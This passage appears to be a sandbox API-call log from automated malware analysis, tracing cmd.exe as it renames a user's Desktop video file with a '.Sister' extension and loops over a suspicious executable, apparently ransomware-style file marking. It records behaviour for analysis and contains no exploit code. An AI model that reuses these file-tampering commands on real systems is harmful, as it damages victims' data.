FindClose (in: hFindFile=0x21ed8d65640 | out: hFindFile=0x21ed8d65640) returned 1 [0164.504] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\NMgihtIW4j90xeC_.mkv", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x794294b0, ftCreationTime.dwHighDateTime=0x1d5e2cc, ftLastAccessTime.dwLowDateTime=0xa2fbffa0, ftLastAccessTime.dwHighDateTime=0x1d5e7f7, ftLastWriteTime.dwLowDateTime=0xa2fbffa0, ftLastWriteTime.dwHighDateTime=0x1d5e7f7, nFileSizeHigh=0x0, nFileSizeLow=0xccc6, dwReserved0=0x4, dwReserved1=0x80, cFileName="NMgihtIW4j90xeC_.mkv", cAlternateFileName="NMGIHT~1.MKV")) returned 0x21ed8d652e0 [0164.505] FindClose (in: hFindFile=0x21ed8d652e0 | out: hFindFile=0x21ed8d652e0) returned 1 [0164.505] _wcsnicmp (_String1="NMGIHT~1.MKV", _String2="NMgihtIW4j90xeC_.mkv", _MaxCount=0x14) returned 21 [0164.505] malloc (_Size=0x1ff9c) returned 0x21ed95a0040 [0164.505] ??_V@YAXPEAX@Z () returned 0x21ed95a0040 [0164.506] GetProcessHeap () returned 0x21ed8c70000 [0164.506] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8a10 [0164.506] ??_V@YAXPEAX@Z () returned 0x1 [0164.506] ??_V@YAXPEAX@Z () returned 0x1 [0164.506] GetProcessHeap () returned 0x21ed8c70000 [0164.506] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9472420, Size=0x1c0) returned 0x21ed9472420 [0164.506] GetProcessHeap () returned 0x21ed8c70000 [0164.506] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9472420) returned 0x1c0 [0164.506] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0164.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0164.506] GetFileType (hFile=0x50) returned 0x2 [0164.506] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0164.506] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0164.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0164.607] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0164.697] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0164.697] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0164.697] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0164.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0164.697] GetFileType (hFile=0x50) returned 0x2 [0164.698] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0164.698] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0164.785] _get_osfhandle (_FileHandle=1) returned 0x50 [0164.785] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0164.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0164.890] GetFileType (hFile=0x50) returned 0x2 [0164.890] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0164.890] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0165.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0165.018] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9471f40*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9471f40*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0165.397] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"NMgihtIW4j90xeC_.mkv\" \"NMgihtIW4j90xeC_.mkv.Sister\" ") returned 54 [0165.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0165.397] GetFileType (hFile=0x50) returned 0x2 [0165.397] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0165.397] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0165.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0165.516] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0165.652] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0165.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0165.652] GetFileType (hFile=0x50) returned 0x2 [0165.652] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0165.652] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0165.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0165.743] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0165.817] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0165.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0165.817] GetFileType (hFile=0x50) returned 0x2 [0165.817] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0165.817] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0165.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0165.947] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0166.032] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0166.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0166.032] GetFileType (hFile=0x50) returned 0x2 [0166.032] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0166.032] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0166.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0166.222] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0166.299] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0166.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0166.299] GetFileType (hFile=0x50) returned 0x2 [0166.299] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0166.299] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0166.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0166.372] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0166.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0166.502] GetFileType (hFile=0x50) returned 0x2 [0166.502] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0166.502] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0166.578] _get_osfhandle (_FileHandle=1) returned 0x50 [0166.578] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed94723f0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed94723f0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0166.649] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"NMgihtIW4j90xeC_.mkv.Sister\" \"NMgihtIW4j90xeC_.bat\" ") returned 54 [0166.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0166.649] GetFileType (hFile=0x50) returned 0x2 [0166.649] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0166.649] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0166.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0166.725] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0166.796] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0166.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0166.796] GetFileType (hFile=0x50) returned 0x2 [0166.796] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0166.804] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0166.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0166.891] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0167.016] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0167.147] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0167.147] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0167.147] malloc (_Size=0xffce) returned 0x21ed95a0040 [0167.147] ??_V@YAXPEAX@Z () returned 0x21ed95a0040 [0167.147] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0167.147] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0167.147] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0167.147] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0167.147] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0167.147] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0167.147] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0167.147] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0167.147] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0167.147] ??_V@YAXPEAX@Z () returned 0x1 [0167.147] GetProcessHeap () returned 0x21ed8c70000 [0167.147] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d63b60 [0167.148] GetProcessHeap () returned 0x21ed8c70000 [0167.148] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63b60, Size=0x7c) returned 0x21ed8d63b60 [0167.148] GetProcessHeap () returned 0x21ed8c70000 [0167.148] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63b60) returned 0x7c [0167.148] GetProcessHeap () returned 0x21ed8c70000 [0167.148] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x84) returned 0x21ed8c75a90 [0167.148] GetProcessHeap () returned 0x21ed8c70000 [0167.148] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d647c0 [0167.148] GetProcessHeap () returned 0x21ed8c70000 [0167.148] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d647c0, Size=0x7c) returned 0x21ed8d647c0 [0167.148] GetProcessHeap () returned 0x21ed8c70000 [0167.148] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d647c0) returned 0x7c [0167.148] malloc (_Size=0xffce) returned 0x21ed95a0040 [0167.148] ??_V@YAXPEAX@Z () returned 0x21ed95a0040 [0167.148] GetProcessHeap () returned 0x21ed8c70000 [0167.148] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64e60 [0167.148] GetProcessHeap () returned 0x21ed8c70000 [0167.148] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9375cb0 [0167.149] _wcsicmp (_String1="NMgihtIW4j90xeC_.mkv", _String2=".") returned 64 [0167.149] _wcsicmp (_String1="NMgihtIW4j90xeC_.mkv", _String2="..") returned 64 [0167.149] GetFileAttributesW (lpFileName="NMgihtIW4j90xeC_.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\nmgihtiw4j90xec_.mkv")) returned 0x20 [0167.150] GetProcessHeap () returned 0x21ed8c70000 [0167.150] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed94725f0 [0167.151] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9472600 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0167.152] SetErrorMode (uMode=0x0) returned 0x0 [0167.152] SetErrorMode (uMode=0x1) returned 0x0 [0167.152] GetFullPathNameW (in: lpFileName="NMgihtIW4j90xeC_.mkv", nBufferLength=0x7fe7, lpBuffer=0x21ed95a0040, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\NMgihtIW4j90xeC_.mkv", lpFilePart=0xa6cf4fd660*="NMgihtIW4j90xeC_.mkv") returned 0x2c [0167.152] SetErrorMode (uMode=0x0) returned 0x1 [0167.152] GetProcessHeap () returned 0x21ed8c70000 [0167.152] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9484d30 [0167.152] _wcsicmp (_String1="NMgihtIW4j90xeC_.mkv", _String2=".") returned 64 [0167.152] _wcsicmp (_String1="NMgihtIW4j90xeC_.mkv", _String2="..") returned 64 [0167.152] GetFileAttributesW (lpFileName="NMgihtIW4j90xeC_.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\nmgihtiw4j90xec_.mkv")) returned 0x20 [0167.153] ??_V@YAXPEAX@Z () returned 0x1 [0167.153] malloc (_Size=0xffce) returned 0x21ed95a0040 [0167.153] ??_V@YAXPEAX@Z () returned 0x21ed95a0040 [0167.153] malloc (_Size=0xffce) returned 0x21ed95b0020 [0167.153] ??_V@YAXPEAX@Z () returned 0x21ed95b0020 [0167.154] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\NMgihtIW4j90xeC_.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\nmgihtiw4j90xec_.mkv")) returned 0x20 [0167.154] malloc (_Size=0xffce) returned 0x21ed923fd00 [0167.154] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0167.154] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\NMgihtIW4j90xeC_.mkv", fInfoLevelId=0x1, lpFindFileData=0x21ed9375cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9375cc0) returned 0x21ed8d64aa0 [0167.155] malloc (_Size=0xffce) returned 0x21ed924fce0 [0167.155] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0167.155] ??_V@YAXPEAX@Z () returned 0x1 [0167.155] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\NMgihtIW4j90xeC_.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\nmgihtiw4j90xec_.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\NMgihtIW4j90xeC_.mkv.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\nmgihtiw4j90xec_.mkv.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0167.195] FindNextFileW (in: hFindFile=0x21ed8d64aa0, lpFindFileData=0x21ed9375cc0 | out: lpFindFileData=0x21ed9375cc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x794294b0, ftCreationTime.dwHighDateTime=0x1d5e2cc, ftLastAccessTime.dwLowDateTime=0xa2fbffa0, ftLastAccessTime.dwHighDateTime=0x1d5e7f7, ftLastWriteTime.dwLowDateTime=0xa2fbffa0, ftLastWriteTime.dwHighDateTime=0x1d5e7f7, nFileSizeHigh=0x0, nFileSizeLow=0xccc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="NMgihtIW4j90xeC_.mkv", cAlternateFileName="")) returned 0 [0167.196] GetLastError () returned 0x12 [0167.196] FindClose (in: hFindFile=0x21ed8d64aa0 | out: hFindFile=0x21ed8d64aa0) returned 1 [0167.196] ??_V@YAXPEAX@Z () returned 0x1 [0167.196] ??_V@YAXPEAX@Z () returned 0x1 [0167.196] ??_V@YAXPEAX@Z () returned 0x1 [0167.198] ??_V@YAXPEAX@Z () returned 0x1 [0167.198] GetProcessHeap () returned 0x21ed8c70000 [0167.198] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64ce0 [0167.198] GetProcessHeap () returned 0x21ed8c70000 [0167.198] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95a80, Size=0x16) returned 0x21ed8c95980 [0167.198] GetProcessHeap () returned 0x21ed8c70000 [0167.198] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95980) returned 0x16 [0167.199] GetProcessHeap () returned 0x21ed8c70000 [0167.199] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0167.199] GetProcessHeap () returned 0x21ed8c70000 [0167.199] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0167.199] GetProcessHeap () returned 0x21ed8c70000 [0167.199] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d64850 [0167.199] GetProcessHeap () returned 0x21ed8c70000 [0167.199] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d64850, Size=0xb2) returned 0x21ed8d64850 [0167.199] GetProcessHeap () returned 0x21ed8c70000 [0167.199] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d64850) returned 0xb2 [0167.199] GetProcessHeap () returned 0x21ed8c70000 [0167.199] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed94865f0 [0167.199] GetProcessHeap () returned 0x21ed8c70000 [0167.199] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed94865f0, Size=0x30) returned 0x21ed94865f0 [0167.199] GetProcessHeap () returned 0x21ed8c70000 [0167.199] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed94865f0) returned 0x30 [0167.199] GetProcessHeap () returned 0x21ed8c70000 [0167.199] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9486630 [0167.199] malloc (_Size=0x1ff9c) returned 0x21ed95a0040 [0167.203] GetProcessHeap () returned 0x21ed8c70000 [0167.203] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937cf10 [0167.203] GetProcessHeap () returned 0x21ed8c70000 [0167.203] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937c9d0 [0167.203] ??_V@YAXPEAX@Z () returned 0x1 [0167.203] malloc (_Size=0x1ff9c) returned 0x21ed95a0040 [0167.203] GetProcessHeap () returned 0x21ed8c70000 [0167.203] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937d210 [0167.203] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed95a0040, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0167.203] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d650a0 [0167.203] FindClose (in: hFindFile=0x21ed8d650a0 | out: hFindFile=0x21ed8d650a0) returned 1 [0167.204] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65580 [0167.205] FindClose (in: hFindFile=0x21ed8d65580 | out: hFindFile=0x21ed8d65580) returned 1 [0167.205] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8e3dfb0d, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x8e3dfb0d, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d64fe0 [0167.205] FindClose (in: hFindFile=0x21ed8d64fe0 | out: hFindFile=0x21ed8d64fe0) returned 1 [0167.205] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8e3dfb0d, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x8e3dfb0d, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0167.205] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0167.206] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0167.207] GetProcessHeap () returned 0x21ed8c70000 [0167.207] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d678b0 [0167.207] ??_V@YAXPEAX@Z () returned 0x1 [0167.207] ??_V@YAXPEAX@Z () returned 0x1 [0167.207] GetProcessHeap () returned 0x21ed8c70000 [0167.207] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9486630, Size=0x490) returned 0x21ed9486630 [0167.207] GetProcessHeap () returned 0x21ed8c70000 [0167.207] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9486630) returned 0x490 [0167.207] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0167.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0167.207] GetFileType (hFile=0x50) returned 0x2 [0167.207] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0167.208] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0167.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0167.289] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0167.383] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0167.383] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0167.383] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0167.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0167.383] GetFileType (hFile=0x50) returned 0x2 [0167.383] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0167.383] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0167.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0167.456] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0167.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0167.538] GetFileType (hFile=0x50) returned 0x2 [0167.538] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0167.538] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: 